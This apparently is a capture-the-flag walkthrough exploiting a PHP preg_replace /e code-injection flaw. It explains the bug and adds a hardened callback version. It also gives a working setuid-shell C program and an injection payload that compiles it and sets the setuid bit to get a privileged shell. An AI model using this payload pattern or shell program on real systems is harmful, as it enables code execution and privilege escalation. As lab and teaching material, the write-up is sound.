The challenge provides the following PHP code:
<?php
function spam($email)
{
    $email = preg_replace("/\./", " dot ", $email);
    $email = preg_replace("/@/", " AT ", $email);
    return $email;
}

function markup($filename, $use_me)
{
    $contents = file_get_contents($filename);
    $contents = preg_replace("/(\[email (.*)\])/e", "spam(\"\\2\")", $contents);
    $contents = preg_replace("/\[/", "<", $contents);
    $contents = preg_replace("/\]/", ">", $contents);
    return $contents;
}

$output = markup($argv[1], $argv[2]);
print $output;
?>
If the input matches the regular expression [email (.*)], every @ is replaced with " AT " and every . with " dot ".
The vulnerability comes from the /e modifier on that regular expression: with /e set, PHP first substitutes the backreferences into the replacement string and then executes the result as PHP code. Because \2 is the attacker-controlled capture and is spliced into a double-quoted PHP string, the input decides what code runs.
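As an added illustration (not part of the original challenge code), the same markup() logic rewritten with preg_replace_callback(), which is what replaced /e after it was deprecated in PHP 5.5 and removed in PHP 7. The capture is handed to spam() as a plain string argument, so it is never part of evaluated source. markup_safe() takes the text directly instead of a filename so the sample inputs, which are constructed here, can be embedded inline.

```php
<?php
// Added example, not the challenge's own code: hardened variant of markup().
function spam(string $email): string
{
    $email = preg_replace("/\./", " dot ", $email);
    $email = preg_replace("/@/", " AT ", $email);
    return $email;
}

// $contents stands in for file_get_contents($filename) from the original.
function markup_safe(string $contents): string
{
    $contents = preg_replace_callback(
        '/\[email (.*)\]/',
        function (array $m): string {
            // $m[1] is data here. Under /e the same text was pasted into a
            // double-quoted PHP string literal and then evaluated, which is
            // why "{${`...`}}" style input could trigger code execution.
            return spam($m[1]);
        },
        $contents
    );
    $contents = preg_replace("/\[/", "<", $contents);
    $contents = preg_replace("/\]/", ">", $contents);
    return $contents;
}

// Constructed sample inputs: a benign address, and input shaped like the
// interpolation trick that /e made dangerous. With the callback it is inert.
$benign  = '[email "alice@example.com"]';
$hostile = '[email "{${`id`}}"]';

echo markup_safe($benign), "\n";
echo markup_safe($hostile), "\n";
?>
```

Running this prints the rewritten address for the first input and the second input unchanged as literal text; nothing in it is interpreted, because no step of the pipeline ever treats the captured substring as PHP source.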
Still in the /home/level09 directory, create level09.c with the following code:
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
    gid_t gid;
    uid_t uid;

    /* Take the effective ids (from the setuid bit) and make them real. */
    gid = getegid();
    uid = geteuid();
    setresgid(gid, gid, gid);
    setresuid(uid, uid, uid);
    system("/bin/bash");
    return 0;
}
Then create the input file in.txt with the following content:
[email "{${`gcc -o /home/flag09/level09 /home/level09/level09.c;chmod +s /home/flag09/level09`}}"]
Run the program:
/home/flag09/flag09 /home/level09/in.txt
This produces the level09 executable in the /home/flag09 directory; run it to get the shell.